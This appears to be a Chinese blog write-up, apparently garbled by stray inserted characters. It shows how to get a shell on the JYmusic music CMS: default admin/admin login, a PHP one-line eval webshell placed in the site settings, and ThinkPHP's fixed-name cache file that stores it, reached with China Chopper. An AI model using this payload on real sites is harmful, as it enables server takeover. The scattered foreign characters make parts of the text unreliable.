一大幫水軍正在來襲......
JYmusic是Php+Mysql開發(fā)的一款開源的跨平臺(tái)音樂管理系統(tǒng),采用國內(nèi)最優(yōu)秀php框架thinkphp褥民。程序完全免費(fèi)飒房,穩(wěn)定,易于擴(kuò)展且具有超強(qiáng)大負(fù)載能力腺阳,完全可以滿足音樂馍盟、DJ于置、音樂分享、音樂資訊站等使用贞岭。
先看一下管理員登錄頁面的源代碼八毯,看到核心入口為ThinkPHP.php,找到并打開查看
admin.php
圖片.png
發(fā)現(xiàn)應(yīng)用緩存目錄為Temp文件夾ThinkPHP.php
圖片.png
打開Temp文件夾會(huì)發(fā)現(xiàn)有很多緩存文件瞄桨,我們隨便打開即可看看话速,可以發(fā)現(xiàn)里面的內(nèi)容有點(diǎn)像網(wǎng)站配置信息,只不過是序列化后的結(jié)果
圖片.png
圖片.png
所以我們?cè)诤笈_(tái)的網(wǎng)站設(shè)置處插入一句話芯侥,就會(huì)被ThinkPHP寫入緩存文件泊交。而且這個(gè)緩存文件的文件名都是固定不變的,這也是導(dǎo)致getshell的原因柱查。
訪問后臺(tái)登陸口
http://127.0.0.1/jymusic_v1.1.1/jymusic/admin.php?s=/public/login.html
用戶名和密碼為 admin admin
圖片.png
添加一句話木馬:
<?php @eval($_POST['cmd']);?>
圖片.png
成功插入后廓俭,我們來執(zhí)行一下phpinfo()函數(shù)看看,菜刀也能成功連接
圖片.png
圖片.png
